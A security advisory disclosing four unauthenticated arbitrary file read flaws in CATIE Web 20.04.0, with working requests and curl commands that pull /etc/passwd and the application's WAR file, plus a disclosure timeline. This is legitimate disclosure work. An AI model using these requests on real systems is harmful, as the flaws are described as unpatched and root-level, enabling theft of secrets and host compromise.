Go inside the minds & methods of modern attackers.... Join us for a live webcast with SANS as we review the results of our recent survey!

Gauge showing high severity reading for a security advisory

Share

CATIE WEB ADVISORY SUMMARY

The following document describes identified vulnerabilities in the CATIE Web application version 20.04.0.

Product Vendor

Status Solutions

Product Description

According to the official product documentation, CATIE Web is “a communication, self-service and resident engagement software that helps seniors connect with their community” while also “keeping staff informed about residents’ needs on a daily basis.” The project’s official website is https://www.statussolutions.com/resident-engagement-catie. The latest version of the application is 21.06.0.

Vulnerabilities List

Four local file disclosure vulnerabilities were identified within the CATIE Web application. These vulnerabilities are described in the following sections.

Affected Version

Version 20.04.0

Summary of Findings

CATIE Web version 20.04 is vulnerable to four local file disclosure vulnerabilities, which enable an unauthenticated remote attacker to read arbitrary files via four separate application endpoints.

High-Risk Impact

An attacker could leverage these vulnerabilities to read or download any file on the host, as the vulnerable service has root privileges. Accessible files may include application source code, password hashes, and cleartext secrets in configuration files. With this level of access, an attacker could likely gain access to the application and eventually compromise the host.

Solution

As of this writing, the vulnerabilities described have not been remediated.


VULNERABILITIES


LOCAL FILE DISCLOSURE

The CATIE Web application was affected by four local file disclosure vulnerabilities via the application’s endpoints. These vulnerabilities allowed all files to be read on the file system, as the vulnerable service was running with root permissions, and could be exploited remotely without authentication.

Vulnerability details

CVE ID

Security Risk

Impact

Access Vector

N/A High Information Disclosure Remote

The assessment team used the /catie/MultiPartUtilityServlet API endpoint to craft a request and successfully retrieved the /etc/passwd file, as shown below:

Request
GET /catie/MultiPartUtilityServlet?file=/passwd&dir=/etc HTTP/1.1
Host: [REDACTED]
...omitted for brevity...
Response
HTTP/1.1 200 200
...omitted for brevity...

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
Demo:x:500:500::/home/Demo:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
support:x:501:501::/home/support:/bin/bash
ladmin:x:502:502::/home/ladmin:/bin/bash

The vulnerable service was running as root and the team identified the location of the catie.war web application deployment file via the root user’s .bash_history file, downloaded it using the arbitrary file read, and extracted the file to access the source code:

$ curl -sk 'https://[REDACTED]/catie/MultiPartUtilityServlet?file=catie.war&dir=/home/apache-tomcat/webapps/' --output catie.war
$ unzip catie.war
...omitted for brevity...
$ ls
admin appadmin catie.war device global META-INF sara WEB-INF

The team performed a cursory code review of the application and identified three additional arbitrary file read vulnerabilities at the following locations:

$ curl -sk 'https://[REDACTED]/catie/ImageGrabberServlet?imageName=/passwd&imageDir=/etc'
$ curl -sk 'https://[REDACTED]/catie/AudioStream?file=/etc/passwd'
$ curl -sk 'https://[REDACTED]/catie/device/carousel/tv/Filewriter?filename=/etc/passwd'


Credits


Timeline

  • 04/12/2021: Initial vulnerability discovery
  • 04/28/2021: Initial attempted contact with vendor via email, no response
  • 4/30/2021: Second attempted contact with vendor via email, no response
  • 5/06/2021: Messaged Status Solutions Facebook account to inquire about a security contact for disclosure, no response
  • 5/27/2021: Called number listed on Status Solutions website (866-846-7272), received voice mailbox
  • 6/02/2021: Emailed technical manager in charge of CATIE Web directly, no response
  • 6/09/2021: Sent second email to technical manager in charge of CATIE Web directly, no response
  • 8/25/2021: Spoke to lead developer via phone, sent PoC details in email
  • 12/02/2021: Advisory published

Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.


Nate Robb

About the author, Nate Robb

Operator

Nate Robb is a Security Associate at Bishop Fox, where he works as an Operator for Cosmos (formerly CAST). Prior to coming to Bishop Fox, he held roles as a security consultant and spent time as a full-time bug bounty hunter, where he worked to secure Fortune 500 companies, state and Federal Agencies, and small and medium-sized businesses

More by Nate

Daniel ritter

About the author, Dan Ritter

Senior Operator

Dan Ritter is an Adversarial Operator on the Bishop Fox Cosmos team. He has previously worked as a security consultant helping to secure products of Fortune 500 companies and served in a defensive role as a security analyst.

More by Dan

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.